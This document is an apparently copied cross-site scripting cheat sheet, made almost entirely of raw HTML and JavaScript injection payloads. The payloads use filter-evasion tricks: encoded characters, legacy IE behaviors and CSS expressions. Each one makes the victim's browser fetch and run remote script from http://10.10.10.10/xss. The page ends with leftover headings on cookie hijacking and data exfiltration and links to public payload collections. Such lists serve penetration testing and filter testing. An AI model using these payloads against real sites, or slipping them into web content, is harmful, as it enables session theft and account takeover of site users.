<comment><img src="</comment><img src=x onerror=javascript:$.getScript("http://10.10.10.10/xss"))//">
<![><img src="]><img src=x onerror=javascript:$.getScript("http://10.10.10.10/xss")//">
<style><img src="</style><img src=x onerror=javascript:$.getScript("http://10.10.10.10/xss")//">
<li style=list-style:url() onerror=javascript:$.getScript("http://10.10.10.10/xss")> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:$.getScript("http://10.10.10.10/xss")></div>
<head><base href="javascript://"></head><body><a href="/. /,javascript:$.getScript("http://10.10.10.10/xss")//#">XXX</a></body>
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:$.getScript("http://10.10.10.10/xss")</SCRIPT>
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:$.getScript("http://10.10.10.10/xss")"></OBJECT>
<b <script>$.getScript("http://10.10.10.10/xss")</script>0
<div id="div1"><input value="``onmouseover=javascript:$.getScript("http://10.10.10.10/xss")"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
<x '="foo"><x foo='><img src=x onerror=javascript:$.getScript("http://10.10.10.10/xss")//'>
<embed src="javascript:$.getScript("http://10.10.10.10/xss")">
<img src="javascript:$.getScript("http://10.10.10.10/xss")">
<image src="javascript:$.getScript("http://10.10.10.10/xss")">
<script src="javascript:$.getScript("http://10.10.10.10/xss")">
<div style=width:1px;filter:glow onfilterchange=javascript:$.getScript("http://10.10.10.10/xss")>x
<? foo="><script>javascript:$.getScript("http://10.10.10.10/xss")</script>">
<! foo="><script>javascript:$.getScript("http://10.10.10.10/xss")</script>">
</ foo="><script>javascript:$.getScript("http://10.10.10.10/xss")</script>">
<? foo="><x foo='?><script>javascript:$.getScript("http://10.10.10.10/xss")</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:$.getScript("http://10.10.10.10/xss")</script>">
<% foo><x foo="%><script>javascript:$.getScript("http://10.10.10.10/xss")</script>">
<div id=d><x xmlns="><iframe onload=javascript:$.getScript("http://10.10.10.10/xss")"></div> <script>d.innerHTML=d.innerHTML</script>
<img \x00src=x onerror="$.getScript("http://10.10.10.10/xss")">
<img \x47src=x onerror="javascript:$.getScript("http://10.10.10.10/xss")">
<img \x11src=x onerror="javascript:$.getScript("http://10.10.10.10/xss")">
<img \x12src=x onerror="javascript:$.getScript("http://10.10.10.10/xss")">
<img\x47src=x onerror="javascript:$.getScript("http://10.10.10.10/xss")">
<img\x10src=x onerror="javascript:$.getScript("http://10.10.10.10/xss")">
<img\x13src=x onerror="javascript:$.getScript("http://10.10.10.10/xss")">
<img\x32src=x onerror="javascript:$.getScript("http://10.10.10.10/xss")">
<img\x47src=x onerror="javascript:$.getScript("http://10.10.10.10/xss")">
<img\x11src=x onerror="javascript:$.getScript("http://10.10.10.10/xss")">
<img \x47src=x onerror="javascript:$.getScript("http://10.10.10.10/xss")">
<img \x34src=x onerror="javascript:$.getScript("http://10.10.10.10/xss")">
<img \x39src=x onerror="javascript:$.getScript("http://10.10.10.10/xss")">
<img \x00src=x onerror="javascript:$.getScript("http://10.10.10.10/xss")">
<img src\x09=x onerror="javascript:$.getScript("http://10.10.10.10/xss")">
<img src\x10=x onerror="javascript:$.getScript("http://10.10.10.10/xss")">
<img src\x13=x onerror="javascript:$.getScript("http://10.10.10.10/xss")">
<img src\x32=x onerror="javascript:$.getScript("http://10.10.10.10/xss")">
<img src\x12=x onerror="javascript:$.getScript("http://10.10.10.10/xss")">
<img src\x11=x onerror="javascript:$.getScript("http://10.10.10.10/xss")">
<img src\x00=x onerror="javascript:$.getScript("http://10.10.10.10/xss")">
<img src\x47=x onerror="javascript:$.getScript("http://10.10.10.10/xss")">
<img src=x\x09onerror="javascript:$.getScript("http://10.10.10.10/xss")">
<img src=x\x10onerror="javascript:$.getScript("http://10.10.10.10/xss")">
<img src=x\x11onerror="javascript:$.getScript("http://10.10.10.10/xss")">
<img src=x\x12onerror="javascript:$.getScript("http://10.10.10.10/xss")">
<img src=x\x13onerror="javascript:$.getScript("http://10.10.10.10/xss")">
<img[a][b][c]src[d]=x[e]onerror=[f]"$.getScript("http://10.10.10.10/xss")">
<img src=x onerror=\x09"javascript:$.getScript("http://10.10.10.10/xss")">
<img src=x onerror=\x10"javascript:$.getScript("http://10.10.10.10/xss")">
<img src=x onerror=\x11"javascript:$.getScript("http://10.10.10.10/xss")">
<img src=x onerror=\x12"javascript:$.getScript("http://10.10.10.10/xss")">
<img src=x onerror=\x32"javascript:$.getScript("http://10.10.10.10/xss")">
<img src=x onerror=\x00"javascript:$.getScript("http://10.10.10.10/xss")">
<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:$.getScript("http://10.10.10.10/xss")>XXX</a>
<img src="x` `<script>javascript:$.getScript("http://10.10.10.10/xss")</script>"` `>
<img src onerror /" '"= alt=javascript:$.getScript("http://10.10.10.10/xss")//">
<title onpropertychange=javascript:$.getScript("http://10.10.10.10/xss")></title><title title=>
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:$.getScript("http://10.10.10.10/xss")></a>">
<!--[if]><script>javascript:$.getScript("http://10.10.10.10/xss")</script -->
<!--[if<img src=x onerror=javascript:$.getScript("http://10.10.10.10/xss")//]> -->
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:$.getScript("http://10.10.10.10/xss")" style="behavior:url(#x);"><param name=postdomevents /></object>
<a style="-o-link:'javascript:javascript:$.getScript("http://10.10.10.10/xss")';-o-link-source:current">X
<style>p[foo=bar{}*{-o-link:'javascript:javascript:$.getScript("http://10.10.10.10/xss")'}{}*{-o-link-source:current}]{color:red};</style>
<link rel=stylesheet href=data:,*%7bx:expression(javascript:$.getScript("http://10.10.10.10/xss"))%7d
<style>@import "data:,*%7bx:expression(javascript:$.getScript("http://10.10.10.10/xss"))%7D";</style>
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:$.getScript("http://10.10.10.10/xss");">XXX</a></a><a href="javascript:javascript:$.getScript("http://10.10.10.10/xss")">XXX</a>
<// style=x:expression\28javascript:$.getScript("http://10.10.10.10/xss")\29>
<style>*{x:ｅｘｐｒｅｓｓｉｏｎ(javascript:$.getScript("http://10.10.10.10/xss"))}</style>
<div style="list-style:url(http://foo.f)\20url(javascript:javascript:$.getScript("http://10.10.10.10/xss"));">X
<script>({set/**/$($){_/**/setter=$,_=javascript:$.getScript("http://10.10.10.10/xss")}}).$=eval</script>
<script>({0:#0=eval/#0#/#0#(javascript:$.getScript("http://10.10.10.10/xss"))})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:$.getScript("http://10.10.10.10/xss")}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:$.getScript("http://10.10.10.10/xss")')()</script>
<meta charset="mac-farsi">¼script¾javascript:$.getScript("http://10.10.10.10/xss")¼/script¾
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:$.getScript("http://10.10.10.10/xss")` >
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:$.getScript("http://10.10.10.10/xss")&gt;`>
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:$.getScript("http://10.10.10.10/xss")&gt;>
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:$.getScript("http://10.10.10.10/xss") strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:$.getScript("http://10.10.10.10/xss")">XXX</a>
<event-source src="%(event)s" onload="javascript:$.getScript("http://10.10.10.10/xss")">
<a href="javascript:javascript:$.getScript("http://10.10.10.10/xss")"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:$.getScript("http://10.10.10.10/xss")&gt;">
<script>javascript:$.getScript("http://10.10.10.10/xss")</script>
<IMG SRC="javascript:javascript:$.getScript("http://10.10.10.10/xss");">
<IMG SRC=javascript:javascript:$.getScript("http://10.10.10.10/xss")>
<IMG SRC=`javascript:javascript:$.getScript("http://10.10.10.10/xss")`>
<FRAMESET><FRAME SRC="javascript:javascript:$.getScript("http://10.10.10.10/xss");"></FRAMESET>
<BODY ONLOAD=javascript:$.getScript("http://10.10.10.10/xss")>
<BODY ONLOAD=javascript:javascript:$.getScript("http://10.10.10.10/xss")>
<IMG SRC="jav	ascript:javascript:$.getScript("http://10.10.10.10/xss");">
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:$.getScript("http://10.10.10.10/xss")>
<IMG SRC="javascript:javascript:$.getScript("http://10.10.10.10/xss")"
<INPUT TYPE="IMAGE" SRC="javascript:javascript:$.getScript("http://10.10.10.10/xss");">
<IMG DYNSRC="javascript:javascript:$.getScript("http://10.10.10.10/xss")">
<IMG LOWSRC="javascript:javascript:$.getScript("http://10.10.10.10/xss")">
<BGSOUND SRC="javascript:javascript:$.getScript("http://10.10.10.10/xss");">
<BR SIZE="&{javascript:$.getScript("http://10.10.10.10/xss")}">
<LINK REL="stylesheet" HREF="javascript:javascript:$.getScript("http://10.10.10.10/xss");">
<STYLE>li {list-style-image: url("javascript:javascript:$.getScript("http://10.10.10.10/xss")");}</STYLE><UL><LI>XSS
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:$.getScript("http://10.10.10.10/xss");">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:$.getScript("http://10.10.10.10/xss");">
<IFRAME SRC="javascript:javascript:$.getScript("http://10.10.10.10/xss");"></IFRAME>
<TABLE BACKGROUND="javascript:javascript:$.getScript("http://10.10.10.10/xss")">
<TABLE><TD BACKGROUND="javascript:javascript:$.getScript("http://10.10.10.10/xss")">
<DIV STYLE="background-image: url(javascript:javascript:$.getScript("http://10.10.10.10/xss"))">
<DIV STYLE="width:expression(javascript:$.getScript("http://10.10.10.10/xss"));">
<IMG STYLE="xss:expr/*XSS*/ession(javascript:$.getScript("http://10.10.10.10/xss"))">
<XSS STYLE="xss:expression(javascript:$.getScript("http://10.10.10.10/xss"))">
<STYLE TYPE="text/javascript">javascript:$.getScript("http://10.10.10.10/xss");</STYLE>
<STYLE>.XSS{background-image:url("javascript:javascript:$.getScript("http://10.10.10.10/xss")");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:javascript:$.getScript("http://10.10.10.10/xss")")}</STYLE>
<!--[if gte IE 4]><SCRIPT>javascript:$.getScript("http://10.10.10.10/xss");</SCRIPT><![endif]-->
<BASE HREF="javascript:javascript:$.getScript("http://10.10.10.10/xss");//">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:$.getScript("http://10.10.10.10/xss")></OBJECT>
<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:$.getScript("http://10.10.10.10/xss")"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:$.getScript("http://10.10.10.10/xss")&lt;/SCRIPT&gt;"></BODY></HTML>
<form id="test" /><button form="test" formaction="javascript:javascript:$.getScript("http://10.10.10.10/xss")">X
<body onscroll=javascript:$.getScript("http://10.10.10.10/xss")><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:$.getScript("http://10.10.10.10/xss")">
<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:$.getScript("http://10.10.10.10/xss");');}</STYLE>
<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:$.getScript("http://10.10.10.10/xss")&&;&&<&&/script&&>
<SCRIPT onreadystatechange=javascript:javascript:$.getScript("http://10.10.10.10/xss");></SCRIPT>
<style onreadystatechange=javascript:javascript:$.getScript("http://10.10.10.10/xss");></style>
<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:$.getScript("http://10.10.10.10/xss");</html:script></html:html>
<embed code=javascript:javascript:$.getScript("http://10.10.10.10/xss");></embed>
<frameset onload=javascript:javascript:$.getScript("http://10.10.10.10/xss")></frameset>
<object onerror=javascript:javascript:$.getScript("http://10.10.10.10/xss")>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:$.getScript("http://10.10.10.10/xss");">]]</C><X></xml>
<IMG SRC=&{javascript:$.getScript("http://10.10.10.10/xss");};>
<a href="jav&#65ascript:javascript:$.getScript("http://10.10.10.10/xss")">test1</a>
<a href="jav&#97ascript:javascript:$.getScript("http://10.10.10.10/xss")">test1</a>
<iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:$.getScript("http://10.10.10.10/xss")&amp;gt;>">
<img src=`%00`&NewLine; onerror=$.getScript("http://10.10.10.10/xss")&NewLine;
<script /*%00*/>/*%00*/$.getScript("http://10.10.10.10/xss")/*%00*/</script /*%00*/
<iframe/src="data:text/html,<svg &#111;&#110;load=$.getScript("http://10.10.10.10/xss")>">
<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; $.getScript("http://10.10.10.10/xss")" http-equiv="refresh"/>
<form><iframe &#09;&#10;&#11; src="javascript&#58;$.getScript("http://10.10.10.10/xss")"&#11;&#10;&#09;;>
&#00;</form><input type&#61;"date" onfocus="$.getScript("http://10.10.10.10/xss")">
<a href="javascript:void(0)" onmouseover=&NewLine;javascript:$.getScript("http://10.10.10.10/xss")&NewLine;>X</a>
<iframe/%00/ src=javaSCRIPT&colon;$.getScript("http://10.10.10.10/xss")
<%<!--'%><script>$.getScript("http://10.10.10.10/xss");</script -->
<script src="data:text/javascript,$.getScript("http://10.10.10.10/xss")"></script>
<iframe/onreadystatechange=$.getScript("http://10.10.10.10/xss")
<svg/onload=$.getScript("http://10.10.10.10/xss")
<input type="text" value=`` <div/onmouseover='$.getScript("http://10.10.10.10/xss")'>X</div>
http://www.<script>$.getScript("http://10.10.10.10/xss")</script .com
<svg><script ?>$.getScript("http://10.10.10.10/xss")
<img src=`xx:xx`onerror=$.getScript("http://10.10.10.10/xss")>
<meta http-equiv="refresh" content="0;javascript&colon;$.getScript("http://10.10.10.10/xss")"/>
<script>+-+-1-+-+$.getScript("http://10.10.10.10/xss")</script>
<body/onload=&lt;!--&gt;&#10$.getScript("http://10.10.10.10/xss")>
<script itworksinallbrowsers>/*<script* */$.getScript("http://10.10.10.10/xss")</script
<img src ?itworksonchrome?\/onerror = $.getScript("http://10.10.10.10/xss")
<svg><script onlypossibleinopera:-)> $.getScript("http://10.10.10.10/xss")
<script x> $.getScript("http://10.10.10.10/xss") </script 1=2
<div/onmouseover='$.getScript("http://10.10.10.10/xss")'> style="x:">
<--`<img/src=` onerror=$.getScript("http://10.10.10.10/xss")> --!>
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="$.getScript("http://10.10.10.10/xss")">x</button>
<form><button formaction=javascript&colon;$.getScript("http://10.10.10.10/xss")>CLICKME

References

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection

https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting

Cookie Hijacking

Data Exifiltration

Bypasses

Base64 encoding

Blind XSS

Blind XSS intruder

References